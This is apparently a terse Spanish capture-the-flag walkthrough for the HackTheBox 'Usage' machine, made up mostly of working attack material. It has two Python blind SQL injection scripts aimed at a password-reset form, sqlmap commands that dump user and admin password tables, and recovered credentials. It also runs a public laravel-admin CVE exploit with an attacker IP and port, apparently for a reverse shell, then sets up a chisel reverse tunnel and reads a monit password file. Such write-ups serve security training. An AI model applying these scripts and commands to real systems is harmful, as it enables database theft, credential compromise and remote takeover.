Usage
Sacar nombre de la base de datos:
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
    """SIGINT handler: print an exit notice and terminate with status 1.

    Installed below via ``signal.signal``; ``sig`` and ``frame`` are the
    standard handler arguments and are not used.
    """
    print("\n\n[!] Saliendo...\n")
    # Equivalent to sys.exit(1): sys.exit just raises SystemExit.
    raise SystemExit(1)
# Route Ctrl-C to the handler above so the progress bars exit cleanly.
signal.signal(signal.SIGINT, sig_handler)
# Global variables
# Candidate alphabet for the character-by-character guess. ``string`` is not
# imported explicitly here; it is presumably re-exported by ``from pwn import *``.
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
# Hard-coded target endpoint (plain http).
url= "http://usage.htb/forget-password"
# Live Laravel session cookie copied from a browser session. This is a bearer
# credential: it expires with the session and should not be committed to a repo.
Cookie= {"laravel_session":"eyJpdiI6Ijl4Y1l0cC9WTVZIYjVKUmtPT3dUYlE9PSIsInZhbHVlIjoiTmFtVDNGUHFaM3RQMForVmljd1VRWEM0c29rNGowR2JqV2FSVXdjamY4OEVMWnBlQVI4ZXhVRzlsTFdUeFlaNkdXZnRLUEo4NDRHQlZUNDFOZUlmK2xoRnd2dDM0RUluN1laamdDOW9venVOY3RKa3RSOXRHRlFhMDl2eWtrUjIiLCJtYWMiOiIzYTlhMDBmZWE2ZTBhZGQ1YTRmMmM2NWI5MjdhYjlmNGJiYWU1NDJmMWNlZGRmMGI4ZDhkYjZmZDBjMGU0MWYwIiwidGFnIjoiIn0%3D"}
# Defined but never passed to the requests session in makeSQLI(), so it has no effect.
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
    """Recover the current database name one character at a time.

    Boolean-based blind SQL injection through the password-reset form: for
    each position, every candidate in ``characters`` is submitted and the
    response body is used as the true/false oracle. Progress is shown with
    pwntools ``log.progress`` bars; the recovered value only lives in the
    local ``database`` string and is never returned.

    Uses the module globals ``url``, ``Cookie`` and ``characters``. The
    module-level ``proxies`` dict is not used here, so requests go out
    directly.
    """
    s=requests.session()
    # Only affects TLS verification; irrelevant for the plain-http ``url``.
    s.verify = False
    p1= log.progress("Fuerza Bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    time.sleep(2)
    p2= log.progress("Database")
    database= ""
    # Positions 1..6: the name length is hard-coded rather than measured, so
    # the loop always stops after six characters whatever the real length is.
    for position in range(1,7):
        for character in characters:
            # Injected boolean condition for this position/candidate pair.
            email= f"' OR ((SUBSTRING(database(),{position},1))='{character}') -- -"
            # NOTE(review): the hard-coded CSRF ``_token`` presumably has to
            # match the session in ``Cookie`` -- confirm if requests start failing.
            payload = { '_token': "ZQ8Qz5Xb9TUv48tUBrz88JwXlsEpUxLXwxsbMF3n" , 'email':email}
            p1.status(email)
            #url = quote(url, safe=':/?&=.,')
            r = s.post(url,data=payload,allow_redirects=True,cookies=Cookie)
            # Oracle: the reset-link message in the body is taken as "condition
            # true". If no candidate matches at this position, nothing is
            # appended and the loop silently moves on, yielding a shorter name.
            if "password reset link" in r.text :
                database += character
                p2.status(database)
                break
# Script entry point: only run the brute force when executed directly.
if __name__ == "__main__":
    makeSQLI()
Sacar nombres de las tablas
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
    """SIGINT handler: print an exit notice and terminate with status 1.

    Installed below via ``signal.signal``; ``sig`` and ``frame`` are the
    standard handler arguments and are not used.
    """
    print("\n\n[!] Saliendo...\n")
    # Same effect as sys.exit(1), which simply raises SystemExit.
    raise SystemExit(1)
# Route Ctrl-C to the handler above so the progress bars exit cleanly.
signal.signal(signal.SIGINT, sig_handler)
# Global variables
# Candidate alphabet for the character-by-character guess. ``string`` is not
# imported explicitly here; it is presumably re-exported by ``from pwn import *``.
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
# Hard-coded target endpoint (plain http).
url= "http://usage.htb/forget-password"
# Live Laravel session cookie copied from a browser session. This is a bearer
# credential: it expires with the session and should not be committed to a repo.
Cookie= {"laravel_session":"eyJpdiI6IjVXNitkMStleUUxeWp6cGlNN1UwWkE9PSIsInZhbHVlIjoiQVc3b09tOGNubWQwUDZ6b1ZkUWhrTVZVb0NFMyttZ1ZnaVdKWkVib3lETkFGRTRvSHpvWURQWkNoOTg4RFV3bjdUK04xS0JoMUUzUm5TQlBFQ2VrU2Zqd0lHSkxuTldCTnMwQTFWMFNNNmFlZUc1b0J6NUVueWtKWU1TY3NGaW4iLCJtYWMiOiI3YzQ5OGM2MDEyNjc1OTRkNmJlZTViNjdjZWEyYWFiY2RiZTk2NGExN2EzOWI1ZDAyNzZkOGM2MDAwZmFkNmRlIiwidGFnIjoiIn0%3D"}
# Defined but never passed to the requests session in makeSQLI(), so it has no effect.
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
    """Recover table names of the current schema one character at a time.

    Boolean-based blind SQL injection through the password-reset form: for
    each table index and each position, every candidate in ``characters`` is
    submitted and the response body is used as the true/false oracle. The
    names are accumulated into the local ``table_name`` string separated by
    ", " and shown on a pwntools progress bar; nothing is returned.

    Uses the module globals ``url``, ``Cookie`` and ``characters``. The
    module-level ``proxies`` dict is not used here, so requests go out
    directly.
    """
    s=requests.session()
    # Only affects TLS verification; irrelevant for the plain-http ``url``.
    s.verify = False
    p1= log.progress("Fuerza Bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    time.sleep(2)
    p2= log.progress("Tables")
    table_name= ""
    # Both bounds are hard-coded guesses: at most 29 tables, at most 14
    # characters per name. Neither is measured, so longer names are truncated
    # and fewer tables just produce trailing ", " separators.
    for table in range(1,30):
        for position in range(1,15):
            for character in characters:
                # Injected boolean condition for this table/position/candidate.
                email= f"' OR (substr((select table_name from information_schema.tables where table_schema=database() limit {table},1) ,{position},1)='{character}') -- -) -- -"
                # NOTE(review): the hard-coded CSRF ``_token`` presumably has to
                # match the session in ``Cookie`` -- confirm if requests start failing.
                payload = { '_token': "ZQ8Qz5Xb9TUv48tUBrz88JwXlsEpUxLXwxsbMF3n" , 'email':email}
                p1.status(email)
                #url = quote(url, safe=':/?&=.,')
                r = s.post(url,data=payload,allow_redirects=True,cookies=Cookie)
                # Oracle: the reset-link message in the body is taken as
                # "condition true". A position with no matching candidate is
                # silently skipped, so a name can come out shorter than it is.
                if "password reset link" in r.text :
                    table_name += character
                    p2.status(table_name)
                    break
        # Separator between table names. Indentation was reconstructed from a
        # flattened paste; this is assumed to run once per table -- TODO confirm.
        table_name += ", "
# Script entry point: only run the brute force when executed directly.
if __name__ == "__main__":
    makeSQLI()
SQLmap
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog --tables
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T users -C email,password
raj \ xander
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T admin_users --columns
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T admin_users -C name,password
Administrator \ whatever1
admin \ whatever1
Chequeamos las dependencias de Laravel y vemos que es posible que laravel-admin sea vulnerable:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
admin
python3 exploit.py -u http://admin.usage.htb/ -U admin -P whatever1 -i 10.10.14.4 -p 4444
staff \ s3cr3t_c0d3d_1uth
Atacante
chisel server --port 8000 --reverse
Víctima
./chisel client 10.10.14.4:8000 R:2812:127.0.0.1:2812
Atacante accede a http://127.0.0.1:2812
La contraseña de monit está en /home/dash/.monitrc
admin \ 3nc0d3d_pa$w0rd